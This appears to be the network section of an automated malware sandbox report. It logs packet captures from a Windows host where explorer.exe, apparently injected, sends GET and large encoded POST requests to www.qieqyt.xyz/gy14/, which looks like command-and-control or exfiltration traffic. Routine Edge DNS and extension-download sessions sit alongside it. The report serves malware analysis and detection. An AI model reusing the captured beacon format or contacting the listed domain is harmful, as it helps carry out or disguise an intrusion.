                                Data Ascii: lVezbShD929Sny9gNwBLZ3uuPB-MF~WBWri~7GfscdCNtw9bRQzRmyVGsPS62Xdv5tR58~XztFgp9WdZM1exmSb44nFM1qLlZhNCgax(WygDFLdpWp6E709GGjRUH5dUO8pTLpLXZVAs5gSSfz4FK7E5jwpflwoQW2mCs7yPIKhCF1LrV0-WCh-O8UKbK4CzxgMQbtYjE(1Mki8W9BaNWTn04nEbcCrtwi8wZfPceFk94XP~WO8
                                May 27, 2024 08:44:54.926371098 CEST34608OUTData Raw: 6c 79 6d 6a 66 78 79 64 72 65 50 54 47 79 68 63 34 65 47 36 32 7e 63 46 6f 68 6d 59 71 46 4a 62 34 43 4d 58 64 4e 53 57 4f 4f 33 51 63 59 7a 62 5a 4b 4c 28 4f 41 70 48 62 51 4f 78 38 56 39 6b 6a 4e 63 4f 48 74 2d 41 50 36 5f 64 47 73 69 34 65 6b
                                Data Ascii: lymjfxydrePTGyhc4eG62~cFohmYqFJb4CMXdNSWOO3QcYzbZKL(OApHbQOx8V9kjNcOHt-AP6_dGsi4ekrngUhyt7LGvjGtgghaWhGLEfP4M~Ix-uRjo1xGx3296w0hB~hTeb-ssgee2CTSWZFYzZKoxq0J6Uc51smjxfjqWeX9IwK7CN1zjwiHbupSaxX45cUk8V_eE6-7DVMru5Kr94W0zNRRv8DZenstFGvXUbjT2N4oHJy
                                May 27, 2024 08:44:54.974325895 CEST1236OUTData Raw: 54 38 77 47 55 77 45 7e 77 57 68 77 65 4e 56 6e 34 72 5f 55 46 7e 61 42 41 34 30 72 2d 64 37 50 30 63 6b 33 71 75 56 31 5f 76 75 4b 2d 31 59 75 7a 63 75 4c 4c 79 7a 30 69 56 61 54 6c 65 31 52 5a 64 79 44 43 42 41 43 69 31 56 41 4e 6c 39 6f 71 41
                                Data Ascii: T8wGUwE~wWhweNVn4r_UF~aBA40r-d7P0ck3quV1_vuK-1YuzcuLLyz0iVaTle1RZdyDCBACi1VANl9oqAZA5ULjWruUVrJyBjWtWfD2hkUkcLUbfdn4vW_qNPj6qCUxjsVBshQYP9IBXhWZlItmuJEd3Vo(KIv4saR7C15iA(HLyiqUHmtnCT8kU7Alb~74ZetFEAWJ5deGnfeK-aur_KlJ2QVZmz5wlVAQ55YOO~pZ1wh4O02
                                May 27, 2024 08:44:55.219618082 CEST1236OUTData Raw: 67 48 74 61 63 7a 43 6b 5a 34 44 39 5f 66 67 4e 68 6f 57 38 69 4b 35 54 6b 59 30 28 65 78 44 57 66 7e 4b 47 66 6c 76 62 34 31 65 73 47 43 64 6c 52 59 6e 51 67 4c 76 53 34 5a 75 6e 45 57 31 72 7a 73 65 4d 4b 38 67 47 71 6d 73 51 34 49 34 30 54 4e
                                Data Ascii: gHtaczCkZ4D9_fgNhoW8iK5TkY0(exDWf~KGflvb41esGCdlRYnQgLvS4ZunEW1rzseMK8gGqmsQ4I40TNellfEbWzzX_tqOsSSk-(gYhjGoS7W3soWKOjaYWitSdy52WnroWskJdEhb65kwMExctk51z7-4GQwsZ6YYPCgZr0vUk2jfnS18lbggkfqcsZIiV8oK57P(T4N7UMP4jxG5qKH6bWUYhauIz(sgN(bTOtk9Natz6nw
                                May 27, 2024 08:44:55.224684000 CEST1236OUTData Raw: 5f 4c 78 28 62 36 43 49 43 61 6f 77 5a 6a 68 55 56 51 32 54 53 30 42 4c 4c 69 6f 66 36 45 6e 50 46 54 6f 66 55 63 49 6b 57 36 6e 41 55 4b 59 6a 64 4f 67 65 52 73 49 65 34 6d 5a 4b 33 38 56 46 6a 4a 4a 68 66 79 75 4e 6f 63 45 37 68 7e 47 74 32 34
                                Data Ascii: _Lx(b6CICaowZjhUVQ2TS0BLLiof6EnPFTofUcIkW6nAUKYjdOgeRsIe4mZK38VFjJJhfyuNocE7h~Gt24W~htfeUH7Umv_Afn_niDwGNxlHAD_zNQ4KyJ041iv(FYcvCaXYkmbAfLybubCmsFjlWuSLSFEMYsQHlqPEJf74d~8kjQOG1pV1QBvx01xLbFrAPBep0NtGumkwL4wLpzJAdAt4FJKXPa1~xrrn3wRNnwVBqF_CFyC


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.44985318.143.129.199802580C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                May 27, 2024 08:45:14.403891087 CEST157OUTGET /gy14/?4hIPNj=6Pri5y0UMTrC/YK0G3cvyv6pjPPZbeJJYk0fOdV+Oxw8pn3IGe/8E0FD3PMHkDwd7eIO&3f=_jAPZR HTTP/1.1
                                Host: www.qieqyt.xyz
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.44985418.143.129.199802580C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                May 27, 2024 08:45:14.918200970 CEST12360OUTPOST /gy14/ HTTP/1.1
                                Host: www.qieqyt.xyz
                                Connection: close
                                Content-Length: 159760
                                Cache-Control: no-cache
                                Origin: http://www.qieqyt.xyz
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                Content-Type: application/x-www-form-urlencoded
                                Accept: */*
                                Referer: http://www.qieqyt.xyz/gy14/
                                Accept-Language: en-US
                                Accept-Encoding: gzip, deflate
                                Data Raw: 34 68 49 50 4e 6a 3d 79 74 6e 59 6e 53 45 43 63 57 57 7a 6d 59 66 54 5a 68 64 7a 75 4f 79 6e 72 71 33 36 4e 65 39 67 41 44 39 37 4e 4b 6c 30 4b 55 34 64 37 30 4b 58 4f 37 6e 73 48 6a 41 52 70 38 4d 6d 6d 69 55 49 28 73 74 67 6f 5f 4e 42 6a 36 67 74 73 6b 6f 57 36 32 76 72 53 4b 49 76 56 55 61 75 69 54 4c 2d 42 30 64 37 38 63 71 73 41 30 56 2d 65 39 73 65 38 44 74 70 31 47 30 71 61 53 73 72 31 4d 65 45 30 74 57 59 35 50 30 35 52 77 77 78 59 69 73 66 37 4a 6d 61 31 32 52 30 39 68 33 58 41 30 4e 63 50 73 62 4e 61 49 54 58 4c 63 74 64 6a 4e 54 65 7e 70 7a 77 4d 39 35 63 75 4d 43 4b 51 6f 70 67 75 73 56 65 28 58 63 39 7a 50 68 42 4a 52 6a 5a 4b 31 47 30 75 70 70 37 52 58 7e 42 53 6a 28 73 61 55 53 6e 75 49 4b 49 69 43 4c 41 52 4b 61 75 6f 67 64 50 64 36 4e 66 4a 6f 6f 74 74 65 44 66 7a 39 70 49 4c 36 46 62 49 5a 4b 79 28 4c 38 78 32 45 33 6a 55 6f 51 68 6f 45 67 57 35 53 43 39 64 54 78 6d 50 6c 35 59 68 4b 53 67 75 55 44 2d 45 74 6d 6a 51 61 48 6f 79 4f 6a 4c 62 58 4f 44 7e 6c 50 34 47 69 69 32 52 51 37 [TRUNCATED]
                                Data Ascii: 4hIPNj=ytnYnSECcWWzmYfTZhdzuOynrq36Ne9gAD97NKl0KU4d70KXO7nsHjARp8MmmiUI(stgo_NBj6gtskoW62vrSKIvVUauiTL-B0d78cqsA0V-e9se8Dtp1G0qaSsr1MeE0tWY5P05RwwxYisf7Jma12R09h3XA0NcPsbNaITXLctdjNTe~pzwM95cuMCKQopgusVe(Xc9zPhBJRjZK1G0upp7RX~BSj(saUSnuIKIiCLARKauogdPd6NfJootteDfz9pIL6FbIZKy(L8x2E3jUoQhoEgW5SC9dTxmPl5YhKSguUD-EtmjQaHoyOjLbXOD~lP4Gii2RQ72qhwlpD74fvpjCYs_H_7D(f5sQcowXbqYDQzntjN7hVquuhr6ny7eYtdHdsMtm9FyQMpa2poaVpf3m-tPkMF7jnsIryD4386eF-uCqmZ8mktY8Da7TGNkEg2y8TGgFV8NkZ9dFxNh0SiwNqwKuEpF02mSOlzS6XkzxRvjh2iNqvV-8s(3uW4NYpV-nTOGf4q2fITrBQJCb0EPEa4JtQbA578PAYq7oehOGQIdYMR65tR7Y7sytjpaCYQW6-R6GD(gkMeD9oeQLBToYV(anvbG0DYUpw1KCnVKPLE4aiTEwpexe4(EkxqRxJ5D5OA7iEmxynI7U-5bZNK_wwnAqGUexbog98bxO-tO(yQ3haDVvQwXzmqWRDYrZ6B3oe7xnHPHmJxcNeXoyrgeB_vqGJKCK1QJvAC-mfasicqMJVQgfUWfIZL4YWc4Yx7ICARp64XHi-VnoPkr6-AUsAw_rn73xESQi0ec7UO5L-TKrBBVlb59zW1knXQReBqDhLoz2lP8tZVgUPni4MUqDiiheOVotHn5eoAxEKfKnrGe9-ze9Q(5TJc1lUkV1zzTMPbfa8fjM1L35jtulXHqcmccP_HkF3MylawdvMf8kYGbFJ2mM1OAjTToHMxCVmAwlXPCE5P74qMyasV-Zxou5EimSKOAOPepLf~eYz1QZ [TRUNCATED]
                                May 27, 2024 08:45:14.923655987 CEST12360OUTData Raw: 35 6d 77 33 63 38 63 50 43 74 5a 36 57 68 78 70 37 47 39 6c 4d 68 4a 6d 5a 53 53 2d 6d 70 6c 63 79 6a 68 49 7a 62 49 6a 48 4e 52 6a 4b 46 63 64 44 62 41 6b 62 7a 4c 34 4d 76 6e 50 4b 73 58 69 38 51 77 71 64 42 47 49 36 55 45 6a 50 72 34 69 4c 55
                                Data Ascii: 5mw3c8cPCtZ6Whxp7G9lMhJmZSS-mplcyjhIzbIjHNRjKFcdDbAkbzL4MvnPKsXi8QwqdBGI6UEjPr4iLUaNuKGSM_s7RsxwEQH4BHo-hU17kuOfMzLTnrwe1slEVmmtUZCMNeuovOAiLQXLBhZhgB~1~SudQeYLa8uc3jNDJQZr9VQBrUbhMJ6tOD4AqootWKsASDhlt7tiG4z22-WkYPvxjiT1FbeoDl~AZ7TxI3HGIO9Je3u
                                May 27, 2024 08:45:14.923719883 CEST2472OUTData Raw: 49 79 78 4d 79 4b 5a 58 49 35 63 5a 69 47 72 39 54 66 6f 45 57 6a 35 46 54 39 4b 4d 73 31 4d 5a 71 74 42 59 41 55 78 52 53 52 38 7a 55 70 35 6f 72 59 44 68 7a 6e 30 75 4c 55 55 35 65 57 7a 35 4a 38 36 76 4b 56 59 4b 46 4f 31 7a 71 52 39 79 78 77
                                Data Ascii: IyxMyKZXI5cZiGr9TfoEWj5FT9KMs1MZqtBYAUxRSR8zUp5orYDhzn0uLUU5eWz5J86vKVYKFO1zqR9yxwiK5UXFarGwJoUK~geI9EOtb6ngOzQMqd6WP6h8piX7yRZJQVgT9Y~gFQbJnqbRvSjSwjVsOo1oTAtGc5YKYUT-lmOaO2930pJ48EB1QRjF(b0CyCvT2oi_8KKp2LOtl8cDHNgUH0ZGPimFvYtymmSE5HgEsg7GaBD
                                May 27, 2024 08:45:14.923827887 CEST2472OUTData Raw: 4b 6b 36 72 4c 4b 63 73 4a 62 59 44 62 43 64 42 41 74 5a 74 36 76 61 58 37 6e 55 46 4d 38 28 74 64 68 75 63 54 6f 36 57 4a 50 48 47 4d 5f 44 4e 47 32 69 31 47 5a 67 4b 71 63 79 4b 7a 36 56 6a 32 37 66 38 47 49 62 36 32 43 6f 51 43 4e 39 6c 61 6e
                                Data Ascii: Kk6rLKcsJbYDbCdBAtZt6vaX7nUFM8(tdhucTo6WJPHGM_DNG2i1GZgKqcyKz6Vj27f8GIb62CoQCN9lanwa0Wl3mce0WNshAS4s8WYChQO9U40_y6sm9Fs58cry7zVqSolZ4bp1~wAffuwb8IqgZde1Fz~sYX~jVqm5teJE69B8eLi78TyXDSLaysP4SxMFTN2_TZfBezQLBFe4pXRc0DCOHwwZTUwoh4Gaq_xryOjdTE6i9eD
                                May 27, 2024 08:45:14.924689054 CEST4944OUTData Raw: 78 65 6b 38 54 36 47 39 47 4f 4d 55 4e 72 71 44 39 37 48 41 73 56 49 39 53 4f 63 39 70 7a 34 77 66 6b 6b 44 6c 38 28 49 6d 39 71 54 74 74 56 36 34 36 32 41 36 6f 52 73 6f 72 63 75 42 69 39 53 76 67 4c 4b 30 39 72 4e 34 6a 4e 77 69 61 36 57 77 31
                                Data Ascii: xek8T6G9GOMUNrqD97HAsVI9SOc9pz4wfkkDl8(Im9qTttV6462A6oRsorcuBi9SvgLK09rN4jNwia6Ww12UnyH2PLDAVLcimR9-9IAtMh3l5uepUFX5RSTKZdtYpR6Yfxjkf9~eZMGJU5qcD-lP8sCvB_FLHM78N3knCAR7DdTwqenkFVis4r8d9kgdKfbfK8DMUgSSQ2SVb5(S3tYWhvV4hHsNc8cOl5JC29Ig7ao-JVPSuZr
                                May 27, 2024 08:45:14.928606987 CEST2472OUTData Raw: 6e 2d 6e 75 44 61 36 48 75 46 4d 48 53 66 69 42 74 66 31 38 6e 4b 76 70 4b 4f 6f 65 54 74 76 63 7a 57 41 6e 4c 65 4c 46 77 64 66 47 6e 44 32 6b 5a 6f 50 6d 66 62 45 54 61 35 72 55 46 42 54 2d 71 4b 4f 43 45 32 61 6f 6a 6c 39 52 37 49 7a 6c 74 72
                                Data Ascii: n-nuDa6HuFMHSfiBtf18nKvpKOoeTtvczWAnLeLFwdfGnD2kZoPmfbETa5rUFBT-qKOCE2aojl9R7IzltreJvxEtuirkfHgHaRTdEYMXqWLfw-mJSS1CUgYogO5azYFRrjFyFUK8UDdJC0e-cxup6twmWG1T(cF1PjIuc4Uv~Qp7AllgqY4AiDy1~6k2Heh1TYEeHY2kWsmKg1XB8Twm7QJ03qV-jzaoS_tsf7rX38WJhKjw~pw
                                May 27, 2024 08:45:14.928991079 CEST2472OUTData Raw: 70 71 47 30 75 39 39 4b 64 6f 33 5a 53 65 4f 32 41 53 44 4e 50 65 30 4f 78 31 70 65 7a 63 42 44 6d 4c 47 70 6c 30 46 48 4f 69 7e 31 32 41 34 70 71 59 6a 72 4a 56 4d 66 33 33 58 54 69 41 54 31 61 78 30 62 67 58 72 79 33 38 6f 4f 28 6f 42 35 6f 54
                                Data Ascii: pqG0u99Kdo3ZSeO2ASDNPe0Ox1pezcBDmLGpl0FHOi~12A4pqYjrJVMf33XTiAT1ax0bgXry38oO(oB5oTTO6Kso0MXrcQ2OmEczkLZtEWzZ0fuMlcHzFSQpTJP0PhLMn1(Jx0OKarSfynBHgADRQ7Hn~ARcx_cyxe3WstAkbnBKt4ZyPWBAP7wf~PYDG7MSHaPlC7vTLvg8I1ClZ3YSKaQfbSMmyW8_OmCc5-H0po9lOLGV5Qs
                                May 27, 2024 08:45:14.929125071 CEST2472OUTData Raw: 48 74 75 44 69 49 39 58 43 65 75 42 64 76 4d 4f 37 74 78 49 77 35 74 45 6e 7a 37 66 4f 6e 6e 4d 30 34 4d 66 51 35 6f 78 4e 4c 39 67 42 6a 66 68 67 50 43 46 59 55 35 6e 38 34 56 50 64 34 63 4c 44 35 47 46 53 54 56 62 6d 57 33 4e 56 77 48 52 4e 78
                                Data Ascii: HtuDiI9XCeuBdvMO7txIw5tEnz7fOnnM04MfQ5oxNL9gBjfhgPCFYU5n84VPd4cLD5GFSTVbmW3NVwHRNxR_Ewk7P4pBgNCYUziQsBzlT-T0CYtGxcB0xTTwe8HhfH4W~Ya2APR_K8Uax7lnj6PUgHwb9HzOQU3bAJEAjgdJXKAm(B4jH8oITUfUewQC8F0hvNhrQ3fo7cJ045~yyfrO0Ls0OSOz~kBwE7mzGA29LmZiHqYAjrh
                                May 27, 2024 08:45:14.929238081 CEST4944OUTData Raw: 41 7a 34 50 32 4c 4b 69 36 58 63 55 57 5f 75 75 4b 78 69 7a 73 41 65 54 4c 72 4f 49 71 68 53 64 48 72 44 41 54 4e 49 68 66 73 45 30 44 6c 71 42 73 41 67 6d 7e 52 53 45 53 44 49 6d 28 55 68 4d 46 41 64 71 7e 79 53 49 67 6e 73 47 61 51 66 4a 7e 47
                                Data Ascii: Az4P2LKi6XcUW_uuKxizsAeTLrOIqhSdHrDATNIhfsE0DlqBsAgm~RSESDIm(UhMFAdq~ySIgnsGaQfJ~G56rNnaY_SiqDUKmuI_3Wt9RqLp8RJ2P5nv1UUA~N2K8lqrKT(7Ra5qV4Nf8pthPG4-ZzpJgDs3jTwyqeqTCA6hYwODY-sevcMpWc3AKXAnFijQBWzzkBUyCSi7jO(R1FnUPCcUkmpdxCcU8h9T0slHoqVel5Tupie
                                May 27, 2024 08:45:14.929296970 CEST2472OUTData Raw: 72 2d 34 30 7e 54 6f 57 75 55 30 4d 73 4d 44 5f 52 63 34 55 68 64 33 44 6d 77 66 4f 76 4a 48 51 35 4a 38 7a 68 4a 43 77 7a 46 39 36 59 57 78 75 72 64 53 4c 68 39 4d 5a 46 6d 74 37 74 75 59 74 59 4d 51 56 6f 34 31 64 39 44 78 79 37 2d 54 6a 61 58
                                Data Ascii: r-40~ToWuU0MsMD_Rc4Uhd3DmwfOvJHQ5J8zhJCwzF96YWxurdSLh9MZFmt7tuYtYMQVo41d9Dxy7-TjaXD-vGWrYZE-Nu~m5fE2Ccv1BwagisH54MfSlq(NbRdMRL0ZaYnrO6dPrgZbpvKTURn0YjJpfEUS7aTQOmvUVxnbkLE-gN~ZrDuAAh3H7XnKAHomCst6On11eg5SBhGL2unGr3HusFB6GKzLDWnzYyyO8r~6scEzLol
                                May 27, 2024 08:45:14.929641962 CEST2472OUTData Raw: 69 4c 34 6f 53 64 4e 70 65 46 77 4e 4d 2d 69 77 51 2d 51 42 33 53 5a 42 57 75 57 42 4a 64 39 56 71 74 6a 59 61 30 4f 37 67 50 55 70 61 4a 65 67 31 56 72 33 34 6d 45 30 4b 58 53 2d 73 36 52 55 4d 39 47 6f 72 5a 38 6b 55 62 6b 5a 71 42 47 7a 47 35
                                Data Ascii: iL4oSdNpeFwNM-iwQ-QB3SZBWuWBJd9VqtjYa0O7gPUpaJeg1Vr34mE0KXS-s6RUM9GorZ8kUbkZqBGzG5clnJMEKM3h1AyTJKKSKmsIu22AaMeIb63mLu1S7Tcaz8Ng0zd3lAa-YzSEDhY8gjSGQ9fsWlxVIRIrlpkaa4Qf1ON6VUy5N81IlJHmv-kgfDagmJ3SvxSUt28ldReBw1ibONSMebg7AiMH6lS_Cav1EyaE9jZsSfY


                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449758162.159.61.34435780C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                TimestampBytes transferredDirectionData
                                2024-05-27 06:42:40 UTC245OUTPOST /dns-query HTTP/1.1
                                Host: chrome.cloudflare-dns.com
                                Connection: keep-alive
                                Content-Length: 128
                                Accept: application/dns-message
                                Accept-Language: *
                                User-Agent: Chrome
                                Accept-Encoding: identity
                                Content-Type: application/dns-message
                                2024-05-27 06:42:40 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: wwwgstaticcom)TP
                                2024-05-27 06:42:40 UTC247INHTTP/1.1 200 OK
                                Server: cloudflare
                                Date: Mon, 27 May 2024 06:42:40 GMT
                                Content-Type: application/dns-message
                                Connection: close
                                Access-Control-Allow-Origin: *
                                Content-Length: 468
                                CF-RAY: 88a406baeed40f67-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-27 06:42:40 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 bc 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: wwwgstaticcom)


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.449759172.64.41.34435780C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                TimestampBytes transferredDirectionData
                                2024-05-27 06:42:40 UTC245OUTPOST /dns-query HTTP/1.1
                                Host: chrome.cloudflare-dns.com
                                Connection: keep-alive
                                Content-Length: 128
                                Accept: application/dns-message
                                Accept-Language: *
                                User-Agent: Chrome
                                Accept-Encoding: identity
                                Content-Type: application/dns-message
                                2024-05-27 06:42:40 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: wwwgstaticcom)TP
                                2024-05-27 06:42:40 UTC247INHTTP/1.1 200 OK
                                Server: cloudflare
                                Date: Mon, 27 May 2024 06:42:40 GMT
                                Content-Type: application/dns-message
                                Connection: close
                                Access-Control-Allow-Origin: *
                                Content-Length: 468
                                CF-RAY: 88a406bb0f89c468-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-27 06:42:40 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f4 00 04 ac d9 a5 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: wwwgstaticcom)


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.449755142.250.184.2254435780C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                TimestampBytes transferredDirectionData
                                2024-05-27 06:42:40 UTC594OUTGET /crx/blobs/AcO95oi6D0F4oCCXbuWOg_kTjmxw8s8dsTSOoPLH-9cazKIP4GZm10_AmRQBwhL1FQ_pwuVBiXNpeijzCuT90r5cABsKnZNHzbhDfTTzc3NFcLwgPYQKIyakH_oQpHvh_HsAxlKa5aSglzp_Czui1gLpPktRBAGI7iwW/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_77_2_0.crx HTTP/1.1
                                Host: clients2.googleusercontent.com
                                Connection: keep-alive
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: empty
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                2024-05-27 06:42:40 UTC566INHTTP/1.1 200 OK
                                Accept-Ranges: bytes
                                Content-Length: 101423
                                X-GUploader-UploadID: ABPtcPpNjMUtxEXZqXWwkv8F9cM0U0vkshgCZ-H90t3fYbtpnD_CmPsXG8-dp-h2WkvuoyVrDQY
                                X-Goog-Hash: crc32c=Vv8qGQ==
                                Server: UploadServer
                                Date: Sun, 26 May 2024 17:32:24 GMT
                                Expires: Mon, 26 May 2025 17:32:24 GMT
                                Cache-Control: public, max-age=31536000
                                Age: 47416
                                Last-Modified: Thu, 23 May 2024 17:32:08 GMT
                                ETag: 9fe6b063_64469d59_d7866d74_8e62669d_f2f68bb2
                                Content-Type: application/x-chrome-extension
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close
                                2024-05-27 06:42:40 UTC824INData Raw: 43 72 32 34 03 00 00 00 64 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                Data Ascii: Cr24d0"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                2024-05-27 06:42:40 UTC1390INData Raw: 3c 8c e7 4b ff e3 af 3f c6 cf aa aa f3 6b fd 97 a1 fa fc cb db 59 55 3f fe eb c7 f5 fc de 57 f2 57 79 e9 c7 aa 1f 7f fc f5 1f 3f 86 fc a1 2e b9 d4 ef af 1e 41 53 98 b6 21 b8 6d a4 66 5d 97 66 ad ca c7 71 cb ad eb 39 eb a6 af cc 1c df 4a 53 6d 45 72 dc a2 c3 b3 8d ce f7 b3 f0 54 2f 52 64 1c 9b cb 59 bf bf 0e 1b 6a 1e bf ff de a9 ab 48 c3 73 a4 c6 9f c7 de a9 a5 f7 7e 8e ce c7 29 6c de 6f a5 67 f7 df ef 29 bb dd 97 84 bb 4b 96 a2 cb f7 e7 85 89 b8 78 18 13 e7 ef 8f a4 1d 31 62 70 a4 dd d8 08 0f 75 79 47 81 9c d9 b1 04 01 42 40 ec 49 17 3c 72 3f d8 54 9e b0 c5 23 d8 9d fc eb b9 f4 a0 91 ef 8f db a3 da 5d 0b 13 d5 85 c7 e6 93 09 bb 93 09 54 69 a1 5a 98 fa 75 37 cc 85 b9 39 9f f6 c1 a3 30 77 7f 8c f3 fb d9 82 29 77 55 cf ac fa 90 40 86 4e 5c 7c 25 1d 83 9c c3
                                Data Ascii: <K?kYU?WWy?.AS!mf]fq9JSmErT/RdYjHs~)log)Kx1bpuyGB@I<r?T#]TiZu790w)wU@N\|%
                                2024-05-27 06:42:40 UTC1390INData Raw: ba f6 81 60 69 eb 9a 45 8b ec 75 f6 5f 79 7f 9c cd 6c 12 a9 f6 7b 85 4d 64 18 16 65 30 97 2e f2 8a 03 8c 73 1f e1 50 b9 96 ec ea 3d 76 a1 d6 80 00 97 0f e0 63 43 7e 2d de bf 3f ae cd dc 1b 32 07 63 d8 2b 25 8c c9 39 51 74 0f e9 d8 51 25 f7 c5 41 ba c9 41 06 25 15 31 06 d8 29 7b ad d1 54 eb 11 a3 53 e8 2f cf 7d f9 ff d0 e0 b2 c1 43 66 d4 4a fa e2 33 37 55 9a b8 e1 48 7c c7 8d 1b d1 0b 33 c8 70 a7 4b c1 72 ce c2 15 19 ed c4 6b a9 a0 83 4d b9 59 5e 7b 72 2d ff 51 e7 dc 0d f6 84 8b e6 ba 95 6e 60 12 00 3b e4 0b 91 1b c3 89 cc 5a 03 3c cc 43 ff d9 8c cd fb 9d f9 38 ce 28 3e 54 dd fb 7d 91 bf b5 76 ed 0d 2e 52 b0 4d ad e1 45 2a 77 8e 60 dd 12 80 28 b6 ea 40 f7 18 89 68 c1 ac 7b 1d aa fd c0 8b 0d f0 82 88 f2 4a 0b 9a c5 72 f6 bb e4 2b d9 e3 56 5d b3 46 b9 55 ef
                                Data Ascii: `iEu_yl{Mde0.sP=vcC~-?2c+%9QtQ%AA%1){TS/}CfJ37UH|3pKrkMY^{r-Qn`;Z<C8(>T}v.RME*w`(@h{Jr+V]FU
